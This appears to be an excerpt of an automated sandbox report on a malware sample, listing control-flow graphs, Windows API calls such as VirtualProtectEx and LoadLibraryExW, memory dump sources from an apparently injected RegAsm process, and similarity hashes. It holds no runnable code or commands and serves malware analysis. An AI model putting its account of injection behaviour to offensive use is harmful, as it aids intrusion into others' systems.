                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D2128B5D05299AFDB01CF9AD880ACEFFB4FF49310F10815AE558A7211C3755905CFA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 30 14b0510-14b1081 VirtualProtectEx 34 14b1088-14b109c 30->34 35 14b1083 30->35 35->34
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualProtectEx.KERNELBASE(?,03F43590,?,00000001,0000012C), ref: 014B1074
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.1340090834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_14b0000_physmeme.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                              • String ID: :>k~
                                                                                                                                                                                                              • API String ID: 544645111-2710823188
                                                                                                                                                                                                              • Opcode ID: 43984d0a258a21490108512ce5229a9cfa67842c9b4d45014e4e4d4ef479ad98
                                                                                                                                                                                                              • Instruction ID: da9f4e855fca1334ee1d9fd3961afbc03bfea0ec78138e86d53a3915a6041d7c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43984d0a258a21490108512ce5229a9cfa67842c9b4d45014e4e4d4ef479ad98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D21FFB5D01259EFDB10CF9AD884ADEFBB4FB48310F10812AEA18A7250C375A954CFA5

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:0.9%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:14.3%
                                                                                                                                                                                                              Total number of Nodes:49
                                                                                                                                                                                                              Total number of Limit Nodes:5
                                                                                                                                                                                                              execution_graph 20789 40d3c0 20790 40d3c9 20789->20790 20791 40d3d1 GetInputState 20790->20791 20792 40d5ae ExitProcess 20790->20792 20793 40d3de 20791->20793 20794 40d3e6 GetCurrentThreadId GetCurrentProcessId 20793->20794 20795 40d5a9 20793->20795 20797 40d41d 20794->20797 20810 446130 FreeLibrary 20795->20810 20803 40ee70 20797->20803 20805 40ee98 20803->20805 20804 40ef5a LoadLibraryExW 20808 40ef6f 20804->20808 20805->20804 20806 40d59b 20806->20795 20809 412610 CoInitialize 20806->20809 20808->20806 20811 40f7b0 20808->20811 20810->20792 20814 40f7f2 20811->20814 20812 40fae4 20812->20808 20814->20812 20815 443160 20814->20815 20816 4431e0 20815->20816 20818 443176 20815->20818 20816->20812 20817 4431c6 RtlFreeHeap 20817->20816 20818->20817 20819 445294 20820 445304 LoadLibraryExW 20819->20820 20821 4452d9 20819->20821 20822 445316 20820->20822 20821->20820 20823 4471b4 20824 4471d0 20823->20824 20826 44721e 20824->20826 20830 446730 LdrInitializeThunk 20824->20830 20829 446730 LdrInitializeThunk 20826->20829 20828 4472cd 20829->20828 20830->20826 20831 446176 20832 446184 20831->20832 20836 4461e8 20831->20836 20833 4461f0 20832->20833 20837 446192 20832->20837 20834 443160 RtlFreeHeap 20833->20834 20834->20836 20835 4461d4 RtlReAllocateHeap 20835->20836 20837->20835 20843 443142 RtlAllocateHeap 20844 447132 20846 446c20 20844->20846 20845 4471a3 20846->20845 20849 446730 LdrInitializeThunk 20846->20849 20848 446ce5 20849->20848 20850 446cf3 20852 446cf8 20850->20852 20851 446dde 20852->20851 20854 446730 LdrInitializeThunk 20852->20854 20854->20851

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentProcess$ExitInputStateThread
                                                                                                                                                                                                              • String ID: clmn$ohij
                                                                                                                                                                                                              • API String ID: 1029096631-3567580053
                                                                                                                                                                                                              • Opcode ID: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
                                                                                                                                                                                                              • Instruction ID: 8f1940826fa5e4ef35febcdafd7184f7e4a9353c3ce711b8b38eacab782ab196
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C841397480D380ABD701AF99D544A1EFBE1AF52709F548C2DE4C4A7392C73AD8588B6B

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 321 445294-4452d7 322 445304-445310 LoadLibraryExW 321->322 323 4452d9 321->323 325 445685-446045 322->325 326 445316-445344 322->326 324 4452e0-445302 call 446520 323->324 324->322 326->325
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0044530C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                              • Opcode ID: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
                                                                                                                                                                                                              • Instruction ID: 32cf0169799236ea817639a585a2fb97fc7d0b73a9cb276cd4531836bf098fa6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4031C375D04296AFDB00CFA8D8502ADFFB1BB15341F684459D440B7352C734AB15CFA9

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 331 443160-44316f 332 443176-443192 331->332 333 4431f6-4431fa 331->333 334 4431f0 331->334 335 4431e0 331->335 336 443194 332->336 337 4431c6-4431df RtlFreeHeap 332->337 334->333 335->334 338 4431a0-4431c4 call 446610 336->338 337->335 338->337
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(6A69686F,00000000,?), ref: 004431D3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
                                                                                                                                                                                                              • Instruction ID: 154aceb0a70e2b1c6176248329647f15dfba9260395587bf241fc84468e2c486
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E501693050C250DBD301AF18E958A0ABBF4EF4AB02F454C68E4C49B362D33ADD24CB9A

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 341 446176-44617d 342 446184-44618b 341->342 343 4461e8-4461ee call 4430d0 341->343 344 4461f0-4461f9 call 443160 342->344 345 446192-4461ab 342->345 351 4461fb-446202 343->351 344->351 349 4461d4-4461e6 RtlReAllocateHeap 345->349 350 4461ad-4461af 345->350 349->351 353 4461b0-4461d2 call 4466b0 350->353 353->349
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f850fbe3fdc24067df6dafc041743f2187b66143897b2b19b35a92ba6be7cc95
                                                                                                                                                                                                              • Instruction ID: c80be1933921a698e0c592e0b6ed05ef8870e218a02cae1fee4b14558d0fb82e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f850fbe3fdc24067df6dafc041743f2187b66143897b2b19b35a92ba6be7cc95
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5012431A00221DBDB058F94EC84AAFBB74FF47701F050866E811EB253D739C510CB6A

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 409 443142-443152 RtlAllocateHeap
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000), ref: 00443148
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
                                                                                                                                                                                                              • Instruction ID: f2ee8ec3101e335420bd073388b79e1bdf2823782e18275de44ef30affdbbf4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CB012300401209BC5141B05FC09F823F209F40661F110060F004480F2C15189A5C5E8